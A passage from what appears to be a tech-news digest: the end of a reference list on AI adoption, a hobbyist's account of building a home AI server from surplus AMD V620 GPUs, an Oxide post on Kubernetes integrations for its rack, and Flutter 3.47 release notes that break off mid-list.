Johnston, D., Holtz, D., Richmond, A. M., Ong, C., Tambe, P., and Chatterji, A. (June 2026). The Shift to Agentic AI: Evidence from Codex. doi: 10.48550/arXiv.2606.26959. arXiv: 2606.26959 [econ.GN]. https://arxiv.org/abs/2606.26959.

Jovanovic, B. and Rousseau, P. L. (2005). “General Purpose Technologies”. Handbook of Economic Growth. Ed. by Aghion, P. and Durlauf, S. N. Vol. 1B. Elsevier. Chap. 18, pp. 1181–1224. doi: 10.1016/S1574-0684(05)01018-X.

Kim, H., Kim, D., and Koning, R. (Mar. 2026). Mapping AI into Production: A Field Experiment on Firm Performance. INSEAD Working Paper 2026/20/STR. INSEAD. doi: 10.2139/ssrn.6513481. https://ssrn.com/abstract=6513481.

Kim, H. and Koning, R. (June 2026). AI-Native Firms. Working Paper 26-090. Harvard Business School. doi: 10.2139/ssrn.6905079. https://ssrn.com/abstract=6905079.

Lindenlaub, I., Oh, R., Rodríguez, M. A., and Veldkamp, L. (May 2026). Beyond Exposure: Predicting AI Adoption Based on Comparative Advantage. NBER Working Paper 35271. National Bureau of Economic Research. doi: 10.3386/w35271. https://www.nber.org/papers/w35271.

Mansfield, E. (1961). “Technical change and the rate of imitation”. Econometrica 29.4, pp. 741–766.

Mansfield, E. (1963). “Intrafirm Rates of Diffusion of an Innovation”. Review of Economics and Statistics 45.4, pp. 348–359. doi: 10.2307/1927919.

Massenkoff, M., Lyubich, E., McCrory, P., Appel, R., and Heller, R. (Mar. 2026a). Anthropic Economic Index Report: Learning Curves. Anthropic research report. https://www.anthropic.com/research/economic-index-march-2026-report.

Massenkoff, M., Lyubich, E., Sacher, S., Hitzig, Z., Zhang, S., Heller, R., and McCrory, P. (June 2026b). Anthropic Economic Index Report: Cadences. Anthropic research report. https://www.anthropic.com/research/economic-index-june-2026-report.

McElheran, K., Li, J. F., Brynjolfsson, E., Kroff, Z., Dinlersoz, E., Foster, L., and Zolas, N. (2024). “AI Adoption in America: Who, What, and Where”. Journal of Economics & Management Strategy 33.2, pp. 375–415.

The Daily Front Page 12 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — AI in the Garage
article

AI At Home Part 1: A Box Of Scraps

by timmmmmmay·▲ 111 points·51 comments·jdagostino.github.io ↗
I've only ever been able to trust a piece of technology if I can take it apart and put it together in my garage.

Chapter 1: A Box Of Scraps

It's an interesting time to be a software dev; the transformer large language model is, in my opinion, the first really new and interesting technological development in the field in a long time. AI coding agents built on this have rapidly become core to working in this profession, and the feeling is kind of like going from doing woodworking with hand tools to using power tools, for better or for worse.

Me, I've only ever been able to trust a piece of technology if I can take it apart and put it together in my garage. The thing where you connect to a service and use a coding agent under somebody else's control bugs me; there's too many ways for this to go wrong. You'll start depending on it and then it'll get taken away from you. This whole technology is exciting, but I don't want to go and connect to some big AI data center somewhere; I want a little AI data center in every home! And we're in something of a computer parts shortage right now (or, maybe the late 2010s were a computer parts surplus?) so to keep things affordable, I'm going to have to build it out of garbage.

we're gonna put an AI data center in every home

The main thing I need here is a bunch of GPUs. I need fast memory going into something that does lots of parallel matrix math and that's what a GPU is. Like I said earlier, though: everything that's designed to run any AI workload at all, or even anything that's known to be good at it, is wildly expensive right now.

Back in 2022, a bunch of companies were trying to make the whole "cloud gaming" thing take off. You know, where you run your video games in a data center somewhere so you don't need to buy an expensive gaming PC or console. AMD took one of their workstation GPUs, gave it some extra RAM and removed all of the video outputs. They called the resulting card the "V620". It was never sold to the public, so you might not have heard of it. AMD wildly overproduced these things and then the whole cloud gaming thing didn't work out because of (in retrospect obvious) problems with lag.

These cards aren't really designed for AI workloads and AMD's software support is notoriously bad, so these things are relatively cheap to buy from the "used server hardware" e-waste resellers on eBay. I don't think the ones I got had actually ever been used, they look basically new. They each have 32GB of pretty fast VRAM. Sure, they have a reputation for being bad at the thing I want to use them for, but how hard can it be to get this to actually work?

Oh, they don't have fans, btw. They're server cards, they expect the server to cool them with some extremely loud blower fan. We'll get to that in a minute.

fit check without fans or power cables

We're in a parts shortage here so I bought some other e-waste to tie the GPU array together. The motherboard is from the X299 platform from 2017, it's from somebody's old gaming rig and was old enough to be cheap on eBay. It has four PCIe x16 slots at the correct spacing for me to stick four GPUs side-by-side, which is the only thing I cared about here. The CPU in it is the Intel Core i9 10900X, which is the worst CPU that Intel has produced in the last twenty years; when it launched in 2019 it was a re-re-re-refreshed version of the Skylake chips, overpriced and power-hungry because Intel couldn't quite catch up with AMD's Ryzen chips at the time, either on processor design or lithography node size. Fine with me, that means it's cheap now, and it'll get the job done!

RAM and SSD were salvaged from other computers around the house. This is cheating, of course; if I had to buy them now they'd be annoyingly expensive. But the requirements here are less severe than you'd think; all of the work will be getting done on the GPU's VRAM; after the model loads from disk these mostly stay idle. If I didn't have salvage parts already, I could go pretty cheap here.

I'm powering four GPUs and Intel's least efficient processor so I got a big power supply. For some reason it was cheaper on eBay to get a 1600W one instead of a 1200W one. I don't expect to be drawing that much power constantly, but I need it to handle everything turning on at once during startup.

Splurged on a new case and fans. Oh, right, the fans! Those data center GPUs do not have cooling fans, they expect airflow from a wall of server fans. There's a bunch of 3D-printable fan shroud models online if you want to cool one of these cards, but if you stack up four of them side-by-side these all seem suboptimal; they either use a tiny super-loud 40mm fan right at the end, or they stick out way to the side and you can't put a bunch of cards next to each other. Four dual-slot cards next to each other is a width of about 160mm, so what I really want is two 80mm server fans right there, blowing over the cards' heatsinks.

I've been using OnShape for this kind of thing lately, it's good

So I modeled and then printed a shroud that would attach an 80mm fan to two cards.1 The cards had some kind of metal cable guide fin on the back, held on by little screws; I used those screw-holes to attach the shroud. There's a cutout in there for the electrical connectors and four holes to mount the fans to the back. I printed this out of carbon fiber ASA, but probably boring old PLA would have worked just fine.

I got these 10,000 RPM fans because I wanted to make sure I was moving enough air, and they were the same price as slower fans. They are really loud! I wanted the motherboard to control their speed based on the GPU temperature, and this didn't work at first, so I just wore ear protection during initial setup.

fits like glove

The box didn't want to boot at first. I probably spent an hour over here wearing earpro standing in the garage playing around with BIOS settings until I figured out which PCIe settings needed to get set in order for the motherboard to actually start up with all four cards connected. (you gotta enable Resizable BAR and MMIO High Size, in two separate menus deep in the advanced option settings, because nobody in 2017 thought you would plug this much VRAM into this board). Around this time I also realized that I didn't have Ethernet in the garage, so I started cutting holes in the drywall at 11:00 PM.

this is a totally normal thing to do

Anyway! After those few false starts, I got this thing to boot and started installing Ubuntu 24.04 on there. With earplugs in and still no fan control, I compiled a build of my favorite inference server, the excellent llama.cpp, and tested out the Gemma4 model, which fits comfortably into one card. This was my favorite local model when I was playing around on a single GPU workstation and it tested out pretty well; not quite as fast as it did on the RTX 3090 that I used to have, but not badly at all. Then I spin up Deepseek V4 Flash, which was the real target for this build. It's slow! At this point I have no idea how to make it fast (more on that next chapter), I just wanted to see if it would fit, and it did.

Back to the fans! Again I cannot stress enough how loud these are. At full blast you can hear them through the walls of the house, and this thing just does not require full blast. The initial plan was to control the fans using the motherboard's built-in fan control, but this board refuses to control different fans at different speeds. Apparently this is common for motherboards from Supermicro. So I built a fan controller instead; I have a whole box of off-brand Arduino Nano clones that I got from Aliexpress in the pre-tariff days; I dug up some code I wrote for a microcontrollers class in college over a decade ago to run a PWM motor and cleaned it up.

The fan controller just gets a percentage from the server; I need a script on the server to read temperatures and scale the fan speed appropriately. And it's an AI server, so I had it write its own fan control script; it seemed fitting. Deepseek V4 Flash is quite capable of this, with the usual amount of guidance and human interaction you need to get decent software out of a lightweight AI model.2 We had a funny moment in there when I told it to think of something to heat up the GPUs so I could test the script, and it starts writing a PyTorch script to do matrix multiplication, and I tell it "no, you are running on these cards, you exist in a llama.cpp instance on this computer, just saying anything will load up the cards" and it had a brief existential crisis. Adorable!

The controller itself is on a prototyping breadboard that I just stuffed into the server case. I put a bit of electrical tape on it so it doesn't short against the case.

It'll probably be fine! Don't worry about it.

At this point the box is pretty stable, I've tested the GPUs out, and I'm ready to really dive into how to get it to run fast, which I'll talk about in the next chapter.


  1. Download the shroud's STL file and print it if you need. [back]
  2. Code for arduino and server script available here. [back]
The Daily Front Page 13 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — The Rack and the Cluster
article

Kubernetes on Oxide: How customer needs shaped our integrations

by stevehipwell·▲ 175 points·75 comments·oxide.computer ↗
The foundation for integration was there. What was missing was the software.

In late 2024, customers and prospects were eager to run Kubernetes on Oxide, but we had no supported integrations to help them do it.

Kubernetes and Oxide are a natural fit. Kubernetes defines the infrastructure behavior it expects through standard extension points, while Oxide exposes the primitives needed to implement that behavior through APIs. The foundation for integration was there. What was missing was the software and an understanding of which integrations customers actually needed.

That was the situation when I joined Oxide as its first Solutions Software Engineer,[1] focused on building software to solve customer problems. My first assignment was to make it easier to deploy and operate Kubernetes on Oxide.

In my first week, I was handed two resources to help me get started:

  1. A customer-submitted pull request for a Rancher node driver
  2. An early draft of RFD 493 Initial Kubernetes Integrations

What began with those two resources grew into a team effort shaped by a feedback loop. Rather than design integrations in the abstract, we followed the problems customers encountered as they moved from provisioning clusters to operating workloads.

This post follows those problems across the Kubernetes lifecycle rather than in strict chronological order. Different provisioning workflows led us to Rancher, Omni, and Cluster API. Running clusters required infrastructure reconciliation, exposing applications revealed networking gaps, and stateful workloads exposed storage constraints. At each stage, customer workflows exposed the next gap, shaping both the integrations we built and the platform work still ahead.

How do I provision a Kubernetes cluster on Oxide?

The first gap we tackled was provisioning. Our immediate goal was to unblock the customer who had submitted the Rancher node driver pull request. Working through their use case would also give us firsthand experience creating Kubernetes clusters on Oxide and help us uncover the next problems to solve.

No single provisioning approach fit all customers' workflows, so we ended up publishing three integrations.

Rancher Node Driver

Before we could maintain the customer-submitted integration, we needed to understand the workflow it supported. I had never used Rancher or worked with a node driver, so reviewing the contribution meant learning both.

A Rancher node driver is an executable plugin that teaches Rancher how to create and manage virtual machines on a particular infrastructure platform. The Oxide Rancher node driver translates those operations into Oxide API requests. Once installed in Rancher, it lets customers provision Oxide instances as nodes in Rancher-managed Kubernetes clusters.

Testing confirmed that the customer’s implementation worked. I merged the pull request, added CI/CD and documentation improvements, and published the initial release. Oxide officially had its first Kubernetes integration—​and a customer was already using it successfully in production!

If you’re a Rancher shop looking to run Kubernetes on Oxide, see our Rancher guide to get started.

Omni Infrastructure Provider

Customers expressed interest in using Sidero Labs' Omni to provision Kubernetes clusters running Talos Linux. Omni connects to infrastructure platforms through infrastructure providers, programs that create Talos Linux instances and register them with Omni.

With KubeCon North America 2025 a few months away, we saw an opportunity to partner with Sidero Labs to build and showcase an Oxide infrastructure provider for Omni. We had seven weeks to complete it before our Oxide+Sidero event.[2] Building against a second provisioning platform would also test Oxide’s APIs across distinct customer workflows.

The integration work uncovered several issues across Omni and Talos Linux. I brought those issues to Sidero Labs in siderolabs/omni#1633, where their team was eager to work with us—​a lovely reminder of RFD 68 Partnership as Shared Values.

The most memorable issue was siderolabs/talos#11948. Oxide uses a FAT12 filesystem for cloud-init user-data, not ISO 9660, but Talos’s filesystem probe only attempted to read an ISO 9660 superblock from the NoCloud configuration disk. When that read failed, the probe stopped instead of trying other formats such as VFAT or MS-DOS. As a result, Talos never read the Oxide user-data containing the configuration needed to join Omni. The fix would not be released in time for KubeCon, leaving us with a rather funny workaround.

The workaround right now is to pad the user-data with comments to increase its size enough that it uses an ISO 9660 superblock.

KubeCon arrived and we hosted an Oxide+Sidero event to showcase the Oxide infrastructure provider for Omni. Customers could now use this infrastructure provider to provision Oxide instances running Talos Linux as nodes in Omni-managed Kubernetes clusters.

If you’re an Omni or Talos Linux shop looking to run Kubernetes on Oxide, see our Omni guide to get started.

Cluster API Provider

We knew we wanted to build an infrastructure provider for Kubernetes Cluster API (CAPI) when we first wrote RFD 493 Initial Kubernetes Integrations. Cluster API offered something our first two integrations did not—​an upstream, provider-extensible API for managing clusters without requiring a third-party platform like Rancher or Omni.

CAPI lets operators declaratively create, scale, upgrade, and delete Kubernetes clusters through Kubernetes custom resources. Infrastructure providers handle the platform-specific work, such as creating and deleting virtual machines. Building one is a significant investment. At the time, customer demand and engineering capacity did not yet justify that investment, so the project was deferred.

Eventually, both changed. Customers began asking for a CAPI provider, and the Solutions Software Engineering team grew. My teammates Josh and Brandon took ownership of the work and released Cluster API Provider Oxide (CAPOx), giving customers a Kubernetes-native way to provision clusters on Oxide.

The Cluster API workflow also exercises several of our other integrations, allowing us to dogfood[3] the end-to-end cluster workflow. The Kubernetes Image Builder uses our Packer plugin to create CAPI-ready Oxide VM images, which CAPOx uses when provisioning instances. Clusters provisioned with CAPOx also use the separately installed Oxide cloud controller manager (CCM) to integrate Kubernetes with Oxide at runtime.

If you want to provision Kubernetes clusters on Oxide with Cluster API, see our Cluster API guide to get started.

How does Kubernetes track Oxide instances?

Provisioning integrations create and manage Oxide instances, but they do not reconcile those instances with Kubernetes Node objects. Without that reconciliation, a cluster could not reliably determine whether an unreachable Kubernetes node was temporarily unavailable or whether its backing Oxide instance had been deleted.

We needed a component that ran in each cluster, spoke to the Oxide API, and continuously reconciled Oxide infrastructure with Kubernetes state. Kubernetes provides a standard extension point for this purpose: the cloud controller manager (CCM). A CCM lets infrastructure-specific controllers integrate Kubernetes resources with an infrastructure provider’s API without adding provider-specific code to Kubernetes itself.

We built the Oxide cloud controller manager to connect Kubernetes with Oxide. Its node controller keeps Kubernetes Node objects synchronized with their backing Oxide instances, recording details such as instance IDs and network addresses, and reporting whether each instance is running, shut down, or no longer exists. Kubernetes uses this information to initialize nodes and safely remove them when their backing instances are deleted.

The CCM does not create instances or provision clusters. That remains the job of provisioning integrations such as the Rancher node driver, the Omni infrastructure provider, and CAPOx. Instead, it provides a runtime integration shared across those provisioning workflows.

Importantly, building the CCM gave us a durable extension point inside each cluster. As Oxide evolves, we can add new infrastructure-aware controllers to the CCM rather than update every provisioning integration.

With that runtime extension point in place, we could address another layer of the Kubernetes experience: exposing applications. The CCM architecture also defines a service controller for Kubernetes LoadBalancer services, giving us a place to address the next customer problem.

How do I use LoadBalancer services?

One of the capabilities customers expect from cloud-integrated Kubernetes is support for Service objects of type LoadBalancer. When a user creates one, Kubernetes asks the cloud provider’s service controller to provision the necessary infrastructure and publish its address in the Service status. There was just one problem: Oxide did not yet offer a native load balancer.

Oxide did, however, have floating IPs. Floating IPs are addresses from a rack’s external IP pools that can be attached to and detached from instances, making those instances reachable from outside their VPCs. Using floating IPs offered a way to unblock LoadBalancer services. A floating IP would deliver traffic to a single Kubernetes node, and the Kubernetes Service dataplane could distribute that traffic to the appropriate pods.

Making that work required accounting for how Oxide floating IPs appear to an instance. They are transparent to the guest in two important ways. First, Oxide translates the destination address of inbound traffic to the instance’s internal IP before sending the traffic to the instance. Second, the instance has no network interface configured with the floating IP.

The resulting traffic flow looks like this:

Traffic flow to a LoadBalancer service using floating IPs.

┌────────────────────────────────────────────────────────────┐
│ Client                                                     │
│ Request to floating IP: 45.154.216.233:80                  │
└────────────────────────────────────────────────────────────┘
                               │
                               ▼
┌────────────────────────────────────────────────────────────┐
│ Oxide networking                                           │
│ Translates destination to internal IP: 172.30.0.5:80       │
└────────────────────────────────────────────────────────────┘
                               │
                               ▼
┌────────────────────────────────────────────────────────────┐
│ Kubernetes node                                            │
│ Packet arrives at internal IP: 172.30.0.5:80               │
└────────────────────────────────────────────────────────────┘
                               │
                               ▼
┌────────────────────────────────────────────────────────────┐
│ Kubernetes Service dataplane                               │
│ Selects a Service endpoint                                 │
└────────────────────────────────────────────────────────────┘
                               │
                               ▼
┌────────────────────────────────────────────────────────────┐
│ Pod                                                        │
│ Receives traffic on its target port                        │
└────────────────────────────────────────────────────────────┘

That address translation created a subtle integration problem. The Kubernetes Service dataplane needed to treat the node’s internal IP as a Service frontend because that was the destination address packets actually carried when they reached the guest. The service controller therefore publishes two entries in status.loadBalancer.ingress:[4]

  1. The attached floating IP in Proxy mode
  2. The node’s internal IP in VIP mode

The status entries look like this:

status:
  loadBalancer:
    ingress:
      - ip: 45.154.216.233
        ipMode: Proxy
      - ip: 172.30.0.5
        ipMode: VIP

As a result, the kubectl output looks a little unusual:

$ kubectl get service nginx
NAME    TYPE           CLUSTER-IP       EXTERNAL-IP                 PORT(S)        AGE
nginx   LoadBalancer   10.106.122.233   45.154.216.233,172.30.0.5   80:30605/TCP   37h

Users see both the floating IP and the node’s internal IP in the EXTERNAL-IP column, even though only the floating IP is externally reachable. This is an imperfect abstraction, but it allows us to support a common Kubernetes workflow while waiting for a native Oxide load balancer.

This implementation currently supports externalTrafficPolicy: Cluster,[5] which allows the selected node to forward traffic to a Service endpoint anywhere in the cluster. If that node disappears, the CCM moves the floating IP to another eligible node and updates the internal address in the Service status.

When Oxide introduces a native load-balancing service, we can update the service controller to use it without changing the Kubernetes interface. Customers will continue creating the same LoadBalancer services and only the infrastructure behind them will change.

To install the Oxide CCM on your cluster, see our CCM guide to get started.

How do I use Oxide storage in Kubernetes?

With clusters provisioned, reconciled with Oxide, and reachable from outside their VPCs, storage for stateful workloads became the next layer to address. Kubernetes users request persistent storage through PersistentVolumeClaim objects and expect a Container Storage Interface (CSI) driver to create, attach, and mount the underlying volumes. Oxide had disks, but Kubernetes had no native way to manage their lifecycle.

Without an Oxide CSI driver, customers could deploy a third-party Kubernetes storage system such as Longhorn. Longhorn provides its own CSI driver and replicates data across disks attached to Kubernetes workers. However, using Longhorn meant backing its replicas with Oxide distributed disks, which already store three replicas on distinct sleds.

Layering one replicated storage system on another can create substantial write fan-out. When a three-replica Longhorn volume is backed by three-way-replicated Oxide distributed disks, one application write can fan out to as many as nine disk writes. The exact physical write amplification depends on the workload and configuration, but customers wanted to avoid that duplicated replication.

The introduction of Oxide local disks provided a way to remove the second layer of replication. Local disks have no built-in replication and remain tied to their sled, making them well suited to systems such as Longhorn that replicate data across Kubernetes nodes. Our Rancher showcase uses this approach today. It avoids stacking two replicated storage systems, though Longhorn still manages the storage lifecycle rather than a native Oxide integration.

For a native integration, my teammate Luiz wrote RFD 595 Oxide CSI Plugin. The workflow seemed straightforward on paper. When a user creates a PersistentVolumeClaim, the CSI controller creates an Oxide distributed disk. After Kubernetes schedules the pod, the controller attaches that disk to the selected Oxide instance, and the CSI node plugin formats and mounts it for the pod. If the pod is rescheduled onto another node, the controller detaches the disk and reattaches it to the new node.

Prototyping that workflow immediately exposed a blocker. Oxide requires an instance to be stopped before attaching or detaching a disk. Kubernetes, however, expects a CSI driver to attach storage to a running worker after scheduling a pod. Stopping the worker would disrupt every other workload on the node and could trigger cascading scheduling and attachment operations.

Before we can release our CSI plugin, we need to add support for disk hot-plug throughout the Oxide stack, from the hypervisor all the way up to the API. What began as a Kubernetes integration has turned into a project spanning multiple layers of the Oxide software stack.

Disk hot-plug and the Oxide CSI plugin remain under active development as of this writing. In the meantime, customers can use software such as Longhorn with Oxide local disks for dynamically provisioned persistent storage without stacking two layers of replication. When the native CSI plugin ships, customers will be able to use familiar Kubernetes storage APIs backed directly by Oxide distributed disks with replication and durability built in.

What’s next?

The result is not a single Kubernetes integration but a growing ecosystem. Rancher, Omni, and Cluster API provide different paths for provisioning, while the Oxide CCM provides a shared runtime integration for node reconciliation and LoadBalancer services. Customers already use some of these integrations in production, and we dogfood several in our own production workloads. Together, they provide a solid foundation to build on.

Our next step is to expand our dogfooding with the newly released Cluster API provider. Using it to provision and operate more of our clusters will test how these integrations work together day to day.

We still have plenty to build and polish. Our near-term work includes completing disk hot-plug and shipping the CSI plugin, adding autoscaling support, and extending the CCM service controller to support external subnets. Longer term, as we ship resource tagging, OIDC support, and native load balancing, we’ll extend our Kubernetes integrations to take advantage of them.

Building these integrations showed how the architectures of Kubernetes and Oxide complement one another. Kubernetes gives infrastructure providers standard extension points, while Oxide exposes infrastructure primitives through APIs. Oxide’s hardware and software co-design lets us address integration blockers at the layer where they belong and carry the necessary changes through the full stack.

This work also lets us exercise our SDKs and APIs from our customers' perspectives and turn customer friction into product improvements. That feedback loop is how we will continue growing this ecosystem. Customer needs shaped each integration in this post, and they will shape the next one, too.

See it in action

To see the Cluster API and cloud controller manager integrations in action, watch the video below, in which I deploy a Kubernetes cluster on Oxide.

Deploy Kubernetes on Oxide with Cluster API

  • 1

    There’s a team now! Check out the Oxide and Friends episode Solutions Software Engineering with Matthew Sanabria.

    View

  • 2

    Our Oxide+Sidero event was November 12, 2025. Work on the Omni infrastructure provider began on September 24.

    View

  • 3

    Dogfooding is the practice of using one’s own products or services. Oxide has a rack named dogfood in the office dedicated to, well, dogfooding.

    View

  • 4

    Kubernetes uses ipMode to indicate whether traffic reaches the node with the load-balancer address as its destination (VIP) or after the destination has been translated (Proxy).

    View

  • 5

    Supporting externalTrafficPolicy: Local would require the floating IP to follow nodes with local Service endpoints as pods are rescheduled, resulting in more attachment and detachment operations.

    View

The Daily Front Page 14 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Frameworks on the Move
article

Flutter 3.47

by gumby271·▲ 194 points·210 comments·flutter.dev ↗
This is a major milestone that decouples design systems from the core SDK.

What's new in Flutter 3.47

What's new in Flutter 3.47

Flutter 3.47 is here, and with it, we’ve got some exciting new updates.

Today, we welcome the 1.0 release of the standalone material_ui and cupertino_ui packages. This is a major milestone that decouples design systems from the core SDK.

We’re also boosting performance and tooling across the board. This release brings Impeller to desktop by default, prepares our pipelines for iOS, macOS, and Xcode 27, and graduates Flutter Widget Previews to stable.

So, run flutter upgrade in your terminal to get started, or read on to learn more about the major changes in this release.


Choose your own UI adventure

The first step toward a decoupled Flutter is here: Material and Cupertino are now available as standalone packages!

One of Flutter’s greatest strengths is its ability to render pixel-perfect Material and Cupertino widgets. However, because these design libraries were historically bundled directly inside the core SDK, it slowed down their development and made it harder to contribute or keep them up to date.

While the core SDK still includes these libraries for this release, you can now opt-in to the standalone material_ui and cupertino_ui packages, which have officially reached version 1.0 on pub.dev.

Decoupling design roadmaps (Opt-in)

By opting into the decoupled design systems, you gain control over your design roadmap. Because material_ui and cupertino_ui now live on pub.dev, they can ship bug fixes and new components on their own weekly schedules, independent of the quarterly Flutter SDK releases.

Decoupling the design systems gives us the following benefits:

  • You can use the latest Cupertino and Material widget styles without being forced to upgrade your entire Flutter SDK version.
  • We can land contributions and updates faster and more frequently.
  • We lay the groundwork for a style-neutral Flutter core widget catalog, making it easier to build custom design systems in the future.

How to migrate

To migrate your project to the new standalone packages, run the following command:

dart fix --apply --code=migrate_design_widgets

This tool automatically updates your imports from package:flutter/material.dart and package:flutter/cupertino.dart to the new standalone packages.

Note: If the migration tool encounters issues updating your pubspec.yaml (a known early bug), you can resolve it by manually running flutter pub add material_ui (and cupertino_ui if you use it), then running dart fix --apply once more.

The original design libraries inside the core SDK are scheduled for formal deprecation in the upcoming Fall stable release in November. If you are migrating a package in the ecosystem, treat this move to the standalone packages as a major release.

Bridging the migration gap

To facilitate bridging the gap as the ecosystem migrates to the new standalone design libraries, material_ui and cupertino_ui ship with migration utilities. The MaterialUiCompatibilityBridge allows your application to migrate to the standalone packages immediately, even if some of your package dependencies are still using legacy core SDK imports.

For example, you can wrap your app in the compatibility bridge:

import 'package:material_ui/material_ui.dart';

void main() {
  runApp(const MyApp());
}

class MyApp extends StatelessWidget {
  const MyApp({super.key});

  @override
  Widget build(BuildContext context) {
    return MaterialApp(
      theme: ThemeData(
        colorScheme: ColorScheme.fromSeed(seedColor: const Color(0xFF6750A4)),
      ),
      builder: (BuildContext context, Widget? child) {
        return MaterialUiCompatibilityBridge(child: child!);
      },
      home: const HomeScreen(),
    );
  }
}

Decoupled localizations

As part of this transition, flutter_localizations has also been unbundled. Localization delegates and translated strings for Material and Cupertino widgets now reside inside package:material_ui and package:cupertino_ui respectively.

Before:

import 'package:flutter_localizations/flutter_localizations.dart';
import 'package:flutter/material.dart';

// ...
localizationsDelegates: const <LocalizationsDelegate<dynamic>>[
  GlobalCupertinoLocalizations.delegate,
  GlobalMaterialLocalizations.delegate,
  GlobalWidgetsLocalizations.delegate,
],

After:

import 'package:material_ui/material_ui.dart';

// ...
localizationsDelegates: GlobalMaterialLocalizations.delegates,

Setting localizationsDelegates to GlobalMaterialLocalizations.delegates now includes the Cupertino and Widgets delegates as well, simplifying your setup.

Architectural diagram showing the unbundling of packages

Decoupling localization structure

Open for contribution

By freezing contributions to the Material and Cupertino libraries back in April, we’ve been able to ensure a smooth migration. The libraries waiting for you in material_ui and cupertino_ui are the same libraries you are already using.

Now that we are ready to lift the freeze, look forward to more fixes and features rolling out on a regular basis in the new packages, with releases currently planned to land weekly. We are also excited to officially open these packages for community contributions.


Prepping for the next wave of Apple updates

With Xcode 27, iOS 27, and macOS 27 arriving this fall, we have focused heavily on making sure Flutter is ready for the upcoming updates. To ensure your users don't experience day-one surprises, we recommend testing your apps against the Apple betas now.

Additionally, to support Xcode 27, the minimum supported OS versions have been bumped:

Platform Previous minimum New minimum (Flutter 3.47+)
iOS 13 15
macOS 10.15 12

UIScene lifecycle mandate

The iOS 27 SDK now mandates the UIScene lifecycle for all UIKit-based apps. Apps built with Xcode 27 that do not adopt UIScene will fail to launch on startup.

For most apps, the Flutter CLI handles this migration automatically during the build. However, manual migration is required if you have custom native code in your AppDelegate or use plugins that still rely on the legacy application lifecycle. In those cases, you must migrate manually by following the UIScene/Delegate Adoption Guide.

Phasing out Intel Macs

In alignment with Apple's transition to Apple Silicon, Flutter is winding down support for Intel-based Macs. We have disabled automated test runs on Intel hardware, and the Flutter CLI now prints warnings when building on Intel hosts or targeting dual architectures. These warnings will become errors in a future release.

You can opt in to building ARM64-only macOS apps immediately by running flutter config --enable-macos-arm64-only.

Swift Package Manager progress

The community has made incredible progress transitioning to Swift Package Manager, with 92 of the top 100 iOS plugins now migrated. If you previously turned Swift Package Manager off, you can try it again by running flutter config --enable-swift-package-manager.

Because CocoaPods is now in maintenance mode, plugins that do not migrate to SwiftPM will eventually stop working. Unmigrated plugins also receive lower pub.dev scores. If you maintain a plugin, consult the Migration Guide and read our previous blog post for more details.

This release also features optimized build times, thanks to community contributor @lukemmtt, who improved build pipelines by filtering out unnecessary SwiftPM package schemes early in the build process.


Setting course for Wasm by default

We are actively working toward enabling WebAssembly (Wasm) by default for Flutter web applications, bringing native-like performance to the browser. If you haven’t tested your web apps with Wasm yet, you can opt-in today by passing the --wasm flag to your release build command:

flutter build web --release --wasm

As you prepare for this transition, keep in mind that Wasm requires migrating your codebase to the new JS interop package (package:web), as the legacy dart:html library is not supported. Upgrading your project’s package dependencies often resolves these legacy interop issues automatically.

To help scale larger web applications, this release also introduces experimental support for deferred loading on Wasm. Available under a flag on the main channel, this allows you to split your Wasm application into smaller, lazy-loaded modules, optimizing initial load times:

flutter build web --release --wasm --enable-wasm-deferred-loading

Modern graphics arrive on the desktop with Impeller

We are committed to making desktop platforms first-class targets for high-performance graphics. In Flutter 3.47, Impeller becomes the default renderer for macOS, Windows, and Linux.

If you are new to Impeller, it is Flutter’s next-generation rendering engine, built from the ground up to replace Skia. By targeting modern hardware APIs (like Metal on macOS and Vulkan on Windows and Linux), Impeller compiles a fixed set of shaders at build time rather than compiling them dynamically at runtime. This eliminates the brief stutter, called shader compilation jank, the first time an animation plays, delivering consistently smooth transitions from the very first frame. Learn more in the Impeller rendering engine documentation.

If you need to temporarily opt out of Impeller, follow these steps:

  • macOS: Set FLTEnableImpeller to false in Info.plist.
  • Windows: Add project.set_impeller_switch(flutter::ImpellerSwitch::Disabled) in main.cpp.
  • Linux: Call fl_dart_project_set_enable_impeller(project, FALSE) in my_application.cc.

Fallback options will be removed in a future release, so file bugs if you must revert to using Skia. Additionally, Wide Gamut Color is now active by default on macOS, delivering rich, vibrant, and precise color rendering on supported hardware.

Experimental multi-window Progress

In partnership with Canonical, and thanks to maintainers @robert-ancell and @mattkae, we are expanding our experimental desktop windowing APIs. Linux and Windows now support popup windows, allowing you to build native context menus and utility palettes.

Popup windows on Win32

Popup windows on Win32

You can also now query windowHandle on platform-specific controllers to get a direct pointer to the underlying native window (HWND, NSWindow, or GtkWindow). This enables advanced native feature access like dockable panes on Windows, such as this dockable panes demo contributed by @orestesgaolin:

Dockable Panes demo

Dockable Panes demo

We also resolved several window focus and realization bugs. On Windows, activating a window no longer pulls background windows forward or steals focus back on app resume, courtesy of contributor @9AZX:

Window focus and realization fix on Windows

Window focus and realization fix

On Linux, multi-window creation now explicitly realizes windows before they receive their first frame from the compositor, fixing early rendering warnings and compositor assertions.

We also added a new sized-to-content API that lets you create regular and dialog windows that are automatically sized to fit their content.

Flavors for desktop

Windows and Linux now support Flutter flavors.

For example, your pubspec.yaml file can use different assets on different flavors:

flutter:
  assets:
    - path: assets/flavor_a/images
      flavors:
        - flavor_a
    - path: assets/flavor_b/images
      flavors:
        - flavor_c

Use the --flavor option to specify your flavor. For example:

  • flutter build windows --flavor flavor_a
  • flutter build linux --flavor flavor_a

Thanks to @AngeloAvv for the wonderful contributions!

Sharper desktop text

Desktop screens often have lower pixel densities than mobile displays but have more graphics compute power. To deliver sharper text and cleaner vector curves on desktop, the Flutter engine using Impeller now utilizes Signed Distance Function (SDF) rendering on macOS, Linux, and Windows.


Stable previews and updates to GenUI

Widget Previews go stable

Flutter Widget Preview is now stable, allowing you to instantly render, inspect, and iterate on individual UI components without building or launching your entire application.

With this stable release, you can expect:

  • Faster startup times thanks to local project caching in a .widget_preview/ folder, which eliminates repeated setup overhead.
  • More flexible testing with an abstract PreviewThemeData API that supports sequential theme layering for complex matrix tests.
  • Automatic web asset synchronization when previewing web widgets, copying your host project's web/ assets directly, applying any custom theming or customizing your index.html file when using Flutter web automatically.

Continued advancements in GenUI

Flutter's ecosystem continues evolving to meet the needs of developers using GenUI to create new kinds of agentic experiences for their users. Version 0.10.0 of the genui package was recently released, bringing a number of fixes and new features, among them:

  • A new a2ui_core package that centralizes classes related to the protocol, including things like expressions, catalog entries, and more.
